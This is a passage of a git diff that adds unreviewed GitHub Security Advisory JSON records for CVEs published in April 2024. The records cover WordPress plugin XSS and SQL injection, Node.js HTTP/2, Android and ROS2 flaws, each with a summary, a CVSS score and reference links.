"id": "GHSA-hxvx-w43m-m8wv", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-29056" + ], + "details": "Windows Authentication Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29056" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29056" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-327" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-j254-m7h5-8jrj/GHSA-j254-m7h5-8jrj.json b/advisories/unreviewed/2024/04/GHSA-j254-m7h5-8jrj/GHSA-j254-m7h5-8jrj.json new file mode 100644 index 00000000000..0213038d809 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-j254-m7h5-8jrj/GHSA-j254-m7h5-8jrj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j254-m7h5-8jrj", + "modified": "2024-04-09T09:31:11Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2024-26276" + ], + "details": "A vulnerability has been identified in Parasolid V35.1 (All versions < V35.1.254), Parasolid V36.0 (All versions < V36.0.207), Parasolid V36.1 (All versions < V36.1.147). The affected application contains a stack exhaustion vulnerability while parsing a specially crafted X_T file. This could allow an attacker to cause denial of service condition.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26276" + }, + { + "type": "WEB", + "url": "https://cert-portal.siemens.com/productcert/html/ssa-222019.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T09:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-j2ch-c7pg-phcj/GHSA-j2ch-c7pg-phcj.json b/advisories/unreviewed/2024/04/GHSA-j2ch-c7pg-phcj/GHSA-j2ch-c7pg-phcj.json new file mode 100644 index 00000000000..04dd3cf970c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-j2ch-c7pg-phcj/GHSA-j2ch-c7pg-phcj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j2ch-c7pg-phcj", + "modified": "2024-04-06T09:31:02Z", + "published": "2024-04-06T09:31:02Z", + "aliases": [ + "CVE-2024-2458" + ], + "details": "The Powerkit – Supercharge your WordPress Site plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 2.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2458" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3057392%40powerkit&new=3057392%40powerkit&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/efb816e4-c07f-4e72-bfd3-06d83ed4d642?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T08:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-j583-rf4p-48jc/GHSA-j583-rf4p-48jc.json b/advisories/unreviewed/2024/04/GHSA-j583-rf4p-48jc/GHSA-j583-rf4p-48jc.json new file mode 100644 index 00000000000..5ef4f7618c7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-j583-rf4p-48jc/GHSA-j583-rf4p-48jc.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j583-rf4p-48jc", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1852" + ], + "details": "The WP-Members Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the X-Forwarded-For header in all versions up to, and including, 3.4.9.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page which is the edit users page. This vulnerability was partially patched in version 3.4.9.2, and was fully patched in 3.4.9.3.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1852" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-members/trunk/includes/class-wp-members-user-profile.php#L566" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-members/trunk/includes/class-wp-members-user.php#L524" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-members/trunk/includes/vendor/rocketgeek-utilities/includes/utilities.php#L168" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/033069d2-8e0f-4c67-b18c-fdd471d85f87?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-j5pj-xphh-fc8m/GHSA-j5pj-xphh-fc8m.json b/advisories/unreviewed/2024/04/GHSA-j5pj-xphh-fc8m/GHSA-j5pj-xphh-fc8m.json new file mode 100644 index 00000000000..db14904baab --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-j5pj-xphh-fc8m/GHSA-j5pj-xphh-fc8m.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j5pj-xphh-fc8m", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2871" + ], + "details": "The Media Library Assistant plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode(s) in all versions up to, and including, 3.13 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2871" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/media-library-assistant/trunk/includes/class-mla-shortcode-custom-list.php#L151" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/media-library-assistant/trunk/includes/class-mla-shortcode-custom-list.php#L1798" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/media-library-assistant/trunk/includes/class-mla-shortcode-custom-list.php#L1949" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9e63fb84-a16b-447f-be73-e01f30881445?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-j65r-8hrg-qc6x/GHSA-j65r-8hrg-qc6x.json b/advisories/unreviewed/2024/04/GHSA-j65r-8hrg-qc6x/GHSA-j65r-8hrg-qc6x.json new file mode 100644 index 00000000000..edbdda7505c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-j65r-8hrg-qc6x/GHSA-j65r-8hrg-qc6x.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j65r-8hrg-qc6x", + "modified": "2024-04-09T03:30:52Z", + "published": "2024-04-09T03:30:52Z", + "aliases": [ + "CVE-2024-27983" + ], + "details": "An attacker can make the Node.js HTTP/2 server completely unavailable by sending a small amount of HTTP/2 frames packets with a few HTTP/2 frames inside. It is possible to leave some data in nghttp2 memory after reset when headers with HTTP/2 CONTINUATION frame are sent to the server and then a TCP connection is abruptly closed by the client triggering the Http2Session destructor while header frames are still being processed (and stored in memory) causing a race condition.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27983" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/2319584" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T01:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-j6hc-65ch-6v6p/GHSA-j6hc-65ch-6v6p.json b/advisories/unreviewed/2024/04/GHSA-j6hc-65ch-6v6p/GHSA-j6hc-65ch-6v6p.json new file mode 100644 index 00000000000..3c3637ee92f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-j6hc-65ch-6v6p/GHSA-j6hc-65ch-6v6p.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j6hc-65ch-6v6p", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1463" + ], + "details": "The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Course, Lesson, and Quiz title and content in all versions up to, and including, 4.2.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with LP Instructor-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1463" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042945%40learnpress%2Ftags%2F4.2.6.3&new=3061851%40learnpress%2Ftags%2F4.2.6.4" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/abb4b617-884b-4e72-812f-5f23a0976ab6?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-j6hp-5gxf-7pf4/GHSA-j6hp-5gxf-7pf4.json b/advisories/unreviewed/2024/04/GHSA-j6hp-5gxf-7pf4/GHSA-j6hp-5gxf-7pf4.json new file mode 100644 index 00000000000..2632e56d978 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-j6hp-5gxf-7pf4/GHSA-j6hp-5gxf-7pf4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j6hp-5gxf-7pf4", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28924" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28924" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28924" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-j6v2-qq8h-fqr7/GHSA-j6v2-qq8h-fqr7.json b/advisories/unreviewed/2024/04/GHSA-j6v2-qq8h-fqr7/GHSA-j6v2-qq8h-fqr7.json new file mode 100644 index 00000000000..394e1e87d35 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-j6v2-qq8h-fqr7/GHSA-j6v2-qq8h-fqr7.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j6v2-qq8h-fqr7", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-30719" + ], + "details": "An insecure deserialization vulnerability has been identified in ROS2 Dashing Diademata in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code and obtain sensitive information via Data Serialization and Deserialization Components, Inter-Process Communication Mechanisms, and Network Communication Interfaces.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30719" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30719" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T03:15:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-j78w-6r6c-3p5g/GHSA-j78w-6r6c-3p5g.json b/advisories/unreviewed/2024/04/GHSA-j78w-6r6c-3p5g/GHSA-j78w-6r6c-3p5g.json new file mode 100644 index 00000000000..691c899ade2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-j78w-6r6c-3p5g/GHSA-j78w-6r6c-3p5g.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j78w-6r6c-3p5g", + "modified": "2024-04-08T03:30:52Z", + "published": "2024-04-08T03:30:52Z", + "aliases": [ + "CVE-2023-52350" + ], + "details": "In ril service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52350" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1777143682512781313" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-j7g7-47xx-jxr6/GHSA-j7g7-47xx-jxr6.json b/advisories/unreviewed/2024/04/GHSA-j7g7-47xx-jxr6/GHSA-j7g7-47xx-jxr6.json new file mode 100644 index 00000000000..166ce11b4cc --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-j7g7-47xx-jxr6/GHSA-j7g7-47xx-jxr6.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j7g7-47xx-jxr6", + "modified": "2024-04-08T18:30:47Z", + "published": "2024-04-08T18:30:47Z", + "aliases": [ + "CVE-2024-3445" + ], + "details": "A vulnerability was found in SourceCodester Laundry Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /karyawan/laporan_filter. The manipulation of the argument data_karyawan leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259702 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3445" + }, + { + "type": "WEB", + "url": "https://github.com/fubxx/CVE/blob/main/LaundryManagementSystemSQL.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259702" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259702" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312296" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T16:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-j7rv-jv5c-9879/GHSA-j7rv-jv5c-9879.json b/advisories/unreviewed/2024/04/GHSA-j7rv-jv5c-9879/GHSA-j7rv-jv5c-9879.json new file mode 100644 index 00000000000..b6bd7261485 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-j7rv-jv5c-9879/GHSA-j7rv-jv5c-9879.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j7rv-jv5c-9879", + "modified": "2024-04-09T21:31:57Z", + "published": "2024-04-09T21:31:57Z", + "aliases": [ + "CVE-2024-1308" + ], + "details": "The WooCommerce Cloak Affiliate Links plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'permalink_settings_save' function in all versions up to, and including, 1.0.33. This makes it possible for unauthenticated attackers to modify the affiliate permalink base, driving traffic to malicious sites via the plugin's affiliate links.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1308" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-cloak-affiliate-links/tags/1.0.33/woocommerce-cloak-affiliate-links.php#L396" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=/woocommerce-cloak-affiliate-links/tags/1.0.33&old=3055367&new_path=/woocommerce-cloak-affiliate-links/tags/1.0.34&new=3055367&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3c731e39-998e-44d2-8cf9-4d9c39731c5d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-j87x-xq7w-hp68/GHSA-j87x-xq7w-hp68.json b/advisories/unreviewed/2024/04/GHSA-j87x-xq7w-hp68/GHSA-j87x-xq7w-hp68.json new file mode 100644 index 00000000000..308dcbb3d34 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-j87x-xq7w-hp68/GHSA-j87x-xq7w-hp68.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j87x-xq7w-hp68", + "modified": "2024-04-05T21:32:43Z", + "published": "2024-04-05T21:32:43Z", + "aliases": [ + "CVE-2024-29740" + ], + "details": "In tmu_set_table of tmu.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29740" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-j8pv-jpqp-m29p/GHSA-j8pv-jpqp-m29p.json b/advisories/unreviewed/2024/04/GHSA-j8pv-jpqp-m29p/GHSA-j8pv-jpqp-m29p.json new file mode 100644 index 00000000000..b8c0ff867fb --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-j8pv-jpqp-m29p/GHSA-j8pv-jpqp-m29p.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j8pv-jpqp-m29p", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-30713" + ], + "details": "An OS command injection vulnerability has been discovered in ROS2 Dashing Diademata in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows remote attackers to execute arbitrary code, escalate privileges, and obtain sensitive information via the External Command Execution Modules, System Call Handlers, and Interface Scripts.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30713" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30713" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T02:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-j947-jfqc-5v3q/GHSA-j947-jfqc-5v3q.json b/advisories/unreviewed/2024/04/GHSA-j947-jfqc-5v3q/GHSA-j947-jfqc-5v3q.json new file mode 100644 index 00000000000..66cf05c7d7a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-j947-jfqc-5v3q/GHSA-j947-jfqc-5v3q.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j947-jfqc-5v3q", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2024-29783" + ], + "details": "In tmu_get_tr_thresholds, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29783" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-j9j7-vrc8-64wq/GHSA-j9j7-vrc8-64wq.json b/advisories/unreviewed/2024/04/GHSA-j9j7-vrc8-64wq/GHSA-j9j7-vrc8-64wq.json new file mode 100644 index 00000000000..19159da9fb3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-j9j7-vrc8-64wq/GHSA-j9j7-vrc8-64wq.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j9j7-vrc8-64wq", + "modified": "2024-04-10T15:30:32Z", + "published": "2024-04-09T18:30:22Z", + "aliases": [ + "CVE-2024-3281" + ], + "details": "A vulnerability was discovered in the firmware builds after 8.0.2.3267 and prior to 8.1.3.1301 in CCX devices. A flaw in the firmware build process did not properly restrict access to a resource from an unauthorized actor.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3281" + }, + { + "type": "WEB", + "url": "https://support.hp.com/us-en/document/ish_10388650-10388701-16/hpsbpy03929" + }, + { + "type": "WEB", + "url": "https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-003.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T16:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-j9xw-m2f5-m3r5/GHSA-j9xw-m2f5-m3r5.json b/advisories/unreviewed/2024/04/GHSA-j9xw-m2f5-m3r5/GHSA-j9xw-m2f5-m3r5.json new file mode 100644 index 00000000000..57ac1e06822 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-j9xw-m2f5-m3r5/GHSA-j9xw-m2f5-m3r5.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j9xw-m2f5-m3r5", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-1999" + ], + "details": "The Gutenberg Blocks by Kadence Blocks – Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Testimonial Widget's anchor style parameter in all versions up to, and including, 3.2.25 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1999" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kadence-blocks/tags/3.2.25/includes/blocks/class-kadence-blocks-testimonial-block.php#L88" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3047463%40kadence-blocks%2Ftrunk&old=3042198%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b5fd4dbe-6f44-45ef-9d49-4bc624fdcc57?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jcrv-j83j-p76q/GHSA-jcrv-j83j-p76q.json b/advisories/unreviewed/2024/04/GHSA-jcrv-j83j-p76q/GHSA-jcrv-j83j-p76q.json new file mode 100644 index 00000000000..ba50e3755a1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jcrv-j83j-p76q/GHSA-jcrv-j83j-p76q.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jcrv-j83j-p76q", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1850" + ], + "details": "The AI Post Generator | AutoWriter plugin for WordPress is vulnerable to unauthorized access, modification or deletion of posts due to a missing capability check on functions hooked by AJAX actions in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with subscriber access or higher, to view all posts generated with this plugin (even in non-published status), create new posts (and publish them), publish unpublished post or perform post deletions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1850" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3056020%40ai-post-generator&new=3056020%40ai-post-generator&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3057511%40ai-post-generator&new=3057511%40ai-post-generator&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/43fc47ca-15ca-4817-b1b8-389245725e73?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-jfm9-vph2-8wfq/GHSA-jfm9-vph2-8wfq.json b/advisories/unreviewed/2024/04/GHSA-jfm9-vph2-8wfq/GHSA-jfm9-vph2-8wfq.json new file mode 100644 index 00000000000..09b086d4082 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-jfm9-vph2-8wfq/GHSA-jfm9-vph2-8wfq.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jfm9-vph2-8wfq", + "modified": "2024-04-08T06:31:30Z", + "published": "2024-04-08T06:31:30Z", + "aliases": [ + "CVE-2024-1589" + ], + "details": "The SendPress Newsletters WordPress plugin through 1.23.11.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1589" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/5cfbbddd-d941-4665-be8b-a54454527571" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T05:15:07Z" + } +} \ No newline at end of file diff --git 